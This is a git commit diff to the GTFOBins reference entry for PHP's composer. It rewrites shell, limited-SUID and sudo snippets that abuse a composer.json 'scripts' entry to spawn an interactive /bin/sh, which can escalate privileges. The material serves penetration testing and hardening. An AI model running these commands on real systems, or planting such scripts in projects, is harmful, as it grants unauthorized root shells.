Update composer

- align to the GTFOBins conventions - avoid Python - use limited SUID instead of just SUID
2024-05-24 08:16:02 +02:00 · 2020-11-08 10:33:56 +01:00 · 2020-11-08 10:33:56 +01:00 · 03c30e9944
parent deaf47943f
commit 03c30e9944
1 changed files with 12 additions and 17 deletions
--- a/_gtfobins/composer.md
+++ b/_gtfobins/composer.md
@ -1,23 +1,18 @@
 ---
 functions:
-  suid:
+  shell:
    - code: |
-        cat << EOF > composer.json
-        {
-            "scripts": {
-                "command": "python3 -c 'import pty;pty.spawn(\"bash\")'"
-            }
-        }
-        EOF
-        ./composer run-script command
+        TF=$(mktemp -d)
+        echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
+        composer --working-dir=$TF run-script x
+  limited-suid:
+    - code: |
+        TF=$(mktemp -d)
+        echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
+        ./composer --working-dir=$TF run-script x
  sudo:
    - code: |
-        cat << EOF > composer.json
-        {
-            "scripts": {
-                "command": "python3 -c 'import pty;pty.spawn(\"bash\")'"
-            }
-        }
-        EOF
-        composer run-script command
+        TF=$(mktemp -d)
+        echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
+        sudo composer --working-dir=$TF run-script x
 ---